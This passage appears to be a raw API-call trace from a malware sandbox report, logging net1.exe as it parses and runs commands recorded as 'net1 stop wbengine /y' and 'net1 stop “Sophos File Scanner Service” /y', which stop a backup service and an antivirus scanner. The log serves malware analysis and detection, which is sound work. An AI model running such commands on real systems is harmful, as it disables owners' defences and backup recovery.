_wcsicmp (_String1="server", _String2="wbengine") returned -4 [0128.353] _wcsicmp (_String1="svr", _String2="wbengine") returned -4 [0128.353] _wcsicmp (_String1="srv", _String2="wbengine") returned -4 [0128.353] _wcsicmp (_String1="lanmanserver", _String2="wbengine") returned -11 [0128.354] _wcsicmp (_String1="alerter", _String2="wbengine") returned -22 [0128.354] _wcsicmp (_String1="netlogon", _String2="wbengine") returned -9 [0128.354] _wcsupr (in: _String="wbengine" | out: _String="WBENGINE") returned="WBENGINE" [0128.354] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2354a8 [0128.607] GetServiceKeyNameW (in: hSCManager=0x2354a8, lpDisplayName="WBENGINE", lpServiceName=0xe5aaf0, lpcchBuffer=0x10fcd0 | out: lpServiceName="", lpcchBuffer=0x10fcd0) returned 0 [0128.608] _wcsicmp (_String1="msg", _String2="WBENGINE") returned -10 [0128.608] _wcsicmp (_String1="messenger", _String2="WBENGINE") returned -10 [0128.608] _wcsicmp (_String1="receiver", _String2="WBENGINE") returned -5 [0128.608] _wcsicmp (_String1="rcv", _String2="WBENGINE") returned -5 [0128.609] _wcsicmp (_String1="redirector", _String2="WBENGINE") returned -5 [0128.609] _wcsicmp (_String1="redir", _String2="WBENGINE") returned -5 [0128.609] _wcsicmp (_String1="rdr", _String2="WBENGINE") returned -5 [0128.609] _wcsicmp (_String1="workstation", _String2="WBENGINE") returned 13 [0128.609] _wcsicmp (_String1="work", _String2="WBENGINE") returned 13 [0128.609] _wcsicmp (_String1="wksta", _String2="WBENGINE") returned 9 [0128.609] _wcsicmp (_String1="prdr", _String2="WBENGINE") returned -7 [0128.609] _wcsicmp (_String1="devrdr", _String2="WBENGINE") returned -19 [0128.609] _wcsicmp (_String1="lanmanworkstation", _String2="WBENGINE") returned -11 [0128.609] _wcsicmp (_String1="server", _String2="WBENGINE") returned -4 [0128.609] _wcsicmp (_String1="svr", _String2="WBENGINE") returned -4 [0128.609] _wcsicmp (_String1="srv", _String2="WBENGINE") returned -4 [0128.609] _wcsicmp (_String1="lanmanserver", _String2="WBENGINE") returned -11 [0128.609] _wcsicmp (_String1="alerter", _String2="WBENGINE") returned -22 [0128.609] _wcsicmp (_String1="netlogon", _String2="WBENGINE") returned -9 [0128.609] NetServiceControl (in: servername=0x0, service="WBENGINE", opcode=0x0, arg=0x0, bufptr=0x10fccc | out: bufptr=0x10fccc) returned 0x0 [0128.612] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x10fca8 | out: Buffer=0x10fca8*=0x237748) returned 0x0 [0128.612] OpenServiceW (hSCManager=0x2354a8, lpServiceName="WBENGINE", dwDesiredAccess=0xc) returned 0x2355c0 [0128.613] QueryServiceStatus (in: hService=0x2355c0, lpServiceStatus=0x10fc7c | out: lpServiceStatus=0x10fc7c*(dwServiceType=0x10, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0128.613] GetServiceDisplayNameW (in: hSCManager=0x2354a8, lpServiceName="WBENGINE", lpDisplayName=0xe61fc0, lpcchBuffer=0x10fc60 | out: lpDisplayName="Block Level Backup Engine Service", lpcchBuffer=0x10fc60) returned 1 [0128.614] NetApiBufferFree (Buffer=0x237748) returned 0x0 [0128.614] CloseServiceHandle (hSCObject=0x2355c0) returned 1 [0128.614] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0128.614] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0128.615] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The Block Level Backup Engine Service service is not started.\r\n") returned 0x3f [0128.617] GetFileType (hFile=0x0) returned 0x0 [0128.617] LocalAlloc (uFlags=0x0, uBytes=0x7e) returned 0x236150 [0128.617] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The Block Level Backup Engine Service service is not started.\r\n", cchWideChar=63, lpMultiByteStr=0x236150, cbMultiByte=126, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The Block Level Backup Engine Service service is not started.\r\n", lpUsedDefaultChar=0x0) returned 63 [0128.617] WriteFile (in: hFile=0x0, lpBuffer=0x236150, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x10fbd0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10fbd0, lpOverlapped=0x0) returned 0 [0128.617] LocalFree (hMem=0x236150) returned 0x0 [0128.617] GetFileType (hFile=0x0) returned 0x0 [0128.617] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x236150 [0128.617] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x236150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n#", lpUsedDefaultChar=0x0) returned 2 [0128.617] WriteFile (in: hFile=0x0, lpBuffer=0x236150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x10fbd0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10fbd0, lpOverlapped=0x0) returned 0 [0128.617] LocalFree (hMem=0x236150) returned 0x0 [0128.617] _ultow (in: _Dest=0xdc1, _Radix=1113088 | out: _Dest=0xdc1) returned="3521" [0128.618] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0128.618] GetFileType (hFile=0x0) returned 0x0 [0128.618] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x236150 [0128.618] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 3521.\r\n", cchWideChar=52, lpMultiByteStr=0x236150, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 3521.\r\n started.\r\n", lpUsedDefaultChar=0x0) returned 52 [0128.618] WriteFile (in: hFile=0x0, lpBuffer=0x236150, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x10fbdc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10fbdc, lpOverlapped=0x0) returned 0 [0128.618] LocalFree (hMem=0x236150) returned 0x0 [0128.618] GetFileType (hFile=0x0) returned 0x0 [0128.618] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x236150 [0128.618] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x236150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n#", lpUsedDefaultChar=0x0) returned 2 [0128.618] WriteFile (in: hFile=0x0, lpBuffer=0x236150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x10fbdc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10fbdc, lpOverlapped=0x0) returned 0 [0128.618] LocalFree (hMem=0x236150) returned 0x0 [0128.618] NetApiBufferFree (Buffer=0x231ae0) returned 0x0 [0128.619] NetApiBufferFree (Buffer=0x231af8) returned 0x0 [0128.619] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop wbengine /y" [0128.619] exit (_Code=2) Process: id = "314" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x50df6000" os_pid = "0x4e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "171" os_parent_pid = "0x11cc" cmd_line = "C:\\Windows\\system32\\net1 stop “Sophos File Scanner Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 722 os_tid = 0xb5c [0128.382] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x29fca4 | out: lpSystemTimeAsFileTime=0x29fca4*(dwLowDateTime=0x20421890, dwHighDateTime=0x1d6f0d1)) [0128.382] GetCurrentProcessId () returned 0x4e8 [0128.382] GetCurrentThreadId () returned 0xb5c [0128.382] GetTickCount () returned 0x1153525 [0128.382] QueryPerformanceCounter (in: lpPerformanceCount=0x29fc9c | out: lpPerformanceCount=0x29fc9c*=24748262717) returned 1 [0128.382] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0128.382] __set_app_type (_Type=0x1) [0128.382] __p__fmode () returned 0x770331f4 [0128.382] __p__commode () returned 0x770331fc [0128.382] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0128.382] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0128.383] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.383] GetConsoleOutputCP () returned 0x1b5 [0128.383] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0128.383] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.386] sprintf_s (in: _DstBuf=0x29fc5c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0128.386] setlocale (category=0, locale=".437") returned="English_United States.437" [0128.389] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0128.389] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0128.389] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “Sophos File Scanner Service” /y" [0128.389] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29fa28, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0128.389] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x9a) returned 0x304ae0 [0128.389] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0128.389] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29fc2c | out: Buffer=0x29fc2c*=0x301b18) returned 0x0 [0128.389] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29fc2c | out: Buffer=0x29fc2c*=0x301b30) returned 0x0 [0128.389] _fileno (_File=0x77032900) returned -2 [0128.389] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0128.389] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0128.389] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0128.389] _wcsicmp (_String1="config", _String2="stop") returned -16 [0128.389] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0128.390] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0128.390] _wcsicmp (_String1="file", _String2="stop") returned -13 [0128.390] _wcsicmp (_String1="files", _String2="stop") returned -13 [0128.390] _wcsicmp (_String1="group", _String2="stop") returned -12 [0128.390] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0128.390] _wcsicmp (_String1="help", _String2="stop") returned -11 [0128.390] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0128.390] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0128.390] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0128.390] _wcsicmp (_String1="session", _String2="stop") returned -15 [0128.390] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0128.390] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0128.390] _wcsicmp (_String1="share", _String2="stop") returned -12 [0128.390] _wcsicmp (_String1="start", _String2="stop") returned -14 [0128.390] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0128.390] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0128.390] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0128.390] _wcsicmp (_String1="accounts", _String2="“Sophos") returned -8123 [0128.390] _wcsicmp (_String1="computer", _String2="“Sophos") returned -8121 [0128.390] _wcsicmp (_String1="config", _String2="“Sophos") returned -8121 [0128.390] _wcsicmp (_String1="continue", _String2="“Sophos") returned -8121 [0128.390] _wcsicmp (_String1="cont", _String2="“Sophos") returned -8121 [0128.391] _wcsicmp (_String1="file", _String2="“Sophos") returned -8118 [0128.391] _wcsicmp (_String1="files", _String2="“Sophos") returned -8118 [0128.391] _wcsicmp (_String1="group", _String2="“Sophos") returned -8117 [0128.391] _wcsicmp (_String1="groups", _String2="“Sophos") returned -8117 [0128.391] _wcsicmp (_String1="help", _String2="“Sophos") returned -8116 [0128.391] _wcsicmp (_String1="helpmsg", _String2="“Sophos") returned -8116 [0128.391] _wcsicmp (_String1="localgroup", _String2="“Sophos") returned -8112 [0128.391] _wcsicmp (_String1="pause", _String2="“Sophos") returned -8108 [0128.391] _wcsicmp (_String1="session", _String2="“Sophos") returned -8105 [0128.391] _wcsicmp (_String1="sessions", _String2="“Sophos") returned -8105 [0128.391] _wcsicmp (_String1="sess", _String2="“Sophos") returned -8105 [0128.391] _wcsicmp (_String1="share", _String2="“Sophos") returned -8105 [0128.391] _wcsicmp (_String1="start", _String2="“Sophos") returned -8105 [0128.391] _wcsicmp (_String1="stats", _String2="“Sophos") returned -8105 [0128.391] _wcsicmp (_String1="statistics", _String2="“Sophos") returned -8105 [0128.391] _wcsicmp (_String1="stop", _String2="“Sophos") returned -8105 [0128.391] _wcsicmp (_String1="time", _String2="“Sophos") returned -8104 [0128.391] _wcsicmp (_String1="user", _String2="“Sophos") returned -8103 [0128.391] _wcsicmp (_String1="users", _String2="“Sophos") returned -8103 [0128.391] _wcsicmp (_String1="msg", _String2="“Sophos") returned -8111 [0128.391] _wcsicmp (_String1="messenger", _String2="“Sophos") returned -8111 [0128.391] _wcsicmp (_String1="receiver", _String2="“Sophos") returned -8106 [0128.391] _wcsicmp (_String1="rcv", _String2="“Sophos") returned -8106 [0128.391] _wcsicmp (_String1="netpopup", _String2="“Sophos") returned -8110 [0128.391] _wcsicmp (_String1="redirector", _String2="“Sophos") returned -8106 [0128.391] _wcsicmp (_String1="redir", _String2="“Sophos") returned -8106 [0128.391] _wcsicmp (_String1="rdr", _String2="“Sophos") returned -8106 [0128.391] _wcsicmp (_String1="workstation", _String2="“Sophos") returned -8101 [0128.391] _wcsicmp (_String1="work", _String2="“Sophos") returned -8101 [0128.391] _wcsicmp (_String1="wksta", _String2="“Sophos") returned -8101 [0128.391] _wcsicmp (_String1="prdr", _String2="“Sophos") returned -8108 [0128.391] _wcsicmp (_String1="devrdr", _String2="“Sophos") returned -8120 [0128.391] _wcsicmp (_String1="lanmanworkstation", _String2="“Sophos") returned -8112 [0128.391] _wcsicmp (_String1="server", _String2="“Sophos") returned -8105 [0128.391] _wcsicmp (_String1="svr", _String2="“Sophos") returned -8105 [0128.392] _wcsicmp (_String1="srv", _String2="“Sophos") returned -8105 [0128.392] _wcsicmp (_String1="lanmanserver", _String2="“Sophos") returned -8112 [0128.392] _wcsicmp (_String1="alerter", _String2="“Sophos") returned -8123 [0128.392] _wcsicmp (_String1="netlogon", _String2="“Sophos") returned -8110 [0128.392] _wcsicmp (_String1="accounts", _String2="File") returned -5 [0128.392] _wcsicmp (_String1="computer", _String2="File") returned -3 [0128.392] _wcsicmp (_String1="config", _String2="File") returned -3 [0128.392] _wcsicmp (_String1="continue", _String2="File") returned -3 [0128.392] _wcsicmp (_String1="cont", _String2="File") returned -3 [0128.392] _wcsicmp (_String1="file", _String2="File") returned 0 [0128.392] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0128.392] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.621] wcscpy_s (in: _Destination=0x29f72c, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0128.621] LoadLibraryW (lpLibFileName="neth.dll") returned 0x70040000 [0128.622] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x29f728, nSize=0x0, Arguments=0x29f724 | out: lpBuffer="勐0neth.dll") returned 0xff [0128.623] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0128.623] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0128.624] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0128.624] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0128.624] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0128.624] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0128.624] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0128.624] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0128.624] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0128.624] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0128.624] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0128.624] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0128.624] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0128.624] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0128.624] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0128.624] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0128.624] _wcsicmp (_String1="CONT", _String2="“Sophos") returned -8121 [0128.624] _wcsicmp (_String1="CONT", _String2="File") returned -3 [0128.624] _wcsicmp (_String1="CONT", _String2="Scanner") returned -16 [0128.624] _wcsicmp (_String1="CONT", _String2="Service”") returned -16 [0128.624] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0128.624] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0128.624] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0128.624] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0128.624] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0128.624] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0128.624] _wcsicmp (_String1="FILES", _String2="“Sophos") returned -8118 [0128.624] _wcsicmp (_String1="FILES", _String2="File") returned 115 [0128.624] _wcsicmp (_String1="FILES", _String2="Scanner") returned -13 [0128.625] _wcsicmp (_String1="FILES", _String2="Service”") returned -13 [0128.625] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0128.625] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0128.625] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0128.625] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0128.625] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0128.625] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0128.625] _wcsicmp (_String1="GROUPS", _String2="“Sophos") returned -8117 [0128.625] _wcsicmp (_String1="GROUPS", _String2="File") returned 1 [0128.625] _wcsicmp (_String1="GROUPS", _String2="Scanner") returned -12 [0128.625] _wcsicmp (_String1="GROUPS", _String2="Service”") returned -12 [0128.625] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0128.625] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0128.625] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0128.625] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0128.625] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0128.625] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0128.625] _wcsicmp (_String1="REPL", _String2="“Sophos") returned -8106 [0128.625] _wcsicmp (_String1="REPL", _String2="File") returned 12 [0128.625] _wcsicmp (_String1="REPL", _String2="Scanner") returned -1 [0128.625] _wcsicmp (_String1="REPL", _String2="Service”") returned -1 [0128.625] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0128.625] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0128.625] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0128.625] _wcsicmp (_String1="REPLICATOR", _String2="“Sophos") returned -8106 [0128.625] _wcsicmp (_String1="REPLICATOR", _String2="File") returned 12 [0128.625] _wcsicmp (_String1="REPLICATOR", _String2="Scanner") returned -1 [0128.625] _wcsicmp (_String1="REPLICATOR", _String2="Service”") returned -1 [0128.626] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0128.626] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0128.626] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0128.626] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0128.626] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0128.626] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0128.626] _wcsicmp (_String1="SESSIONS", _String2="“Sophos") returned -8105 [0128.626] _wcsicmp (_String1="SESSIONS", _String2="File") returned 13 [0128.626] _wcsicmp (_String1="SESSIONS", _String2="Scanner") returned 2 [0128.626] _wcsicmp (_String1="SESSIONS", _String2="Service”") returned 1 [0128.626] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0128.626] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0128.626] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0128.626] _wcsicmp (_String1="SESS", _String2="“Sophos") returned -8105 [0128.626] _wcsicmp (_String1="SESS", _String2="File") returned 13 [0128.626] _wcsicmp (_String1="SESS", _String2="Scanner") returned 2 [0128.626] _wcsicmp (_String1="SESS", _String2="Service”") returned 1 [0128.626] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0128.626] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0128.626] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0128.626] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0128.626] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0128.626] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0128.626] _wcsicmp (_String1="STATS", _String2="“Sophos") returned -8105 [0128.626] _wcsicmp (_String1="STATS", _String2="File") returned 13 [0128.626] _wcsicmp (_String1="STATS", _String2="Scanner") returned 17 [0128.626] _wcsicmp (_String1="STATS", _String2="Service”") returned 15 [0128.626] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0128.627] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0128.627] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0128.627] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0128.627] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0128.627] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0128.627] _wcsicmp (_String1="USERS", _String2="“Sophos") returned -8103 [0128.627] _wcsicmp (_String1="USERS", _String2="File") returned 15 [0128.627] _wcsicmp (_String1="USERS", _String2="Scanner") returned 2 [0128.627] _wcsicmp (_String1="USERS", _String2="Service”") returned 2 [0128.627] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0128.627] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0128.627] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0128.627] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0128.627] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0128.627] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0128.627] _wcsicmp (_String1="REDIRECTOR", _String2="“Sophos") returned -8106 [0128.627] _wcsicmp (_String1="REDIRECTOR", _String2="File") returned 12 [0128.627] _wcsicmp (_String1="REDIRECTOR", _String2="Scanner") returned -1 [0128.627] _wcsicmp (_String1="REDIRECTOR", _String2="Service”") returned -1 [0128.627] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0128.627] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0128.627] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0128.627] _wcsicmp (_String1="REDIR", _String2="“Sophos") returned -8106 [0128.627] _wcsicmp (_String1="REDIR", _String2="File") returned 12 [0128.627] _wcsicmp (_String1="REDIR", _String2="Scanner") returned -1 [0128.627] _wcsicmp (_String1="REDIR", _String2="Service”") returned -1 [0128.627] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0128.628] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0128.628] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0128.628] _wcsicmp (_String1="RDR", _String2="“Sophos") returned -8106 [0128.628] _wcsicmp (_String1="RDR", _String2="File") returned 12 [0128.628] _wcsicmp (_String1="RDR", _String2="Scanner") returned -1 [0128.628] _wcsicmp (_String1="RDR", _String2="Service”") returned -1 [0128.628] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" 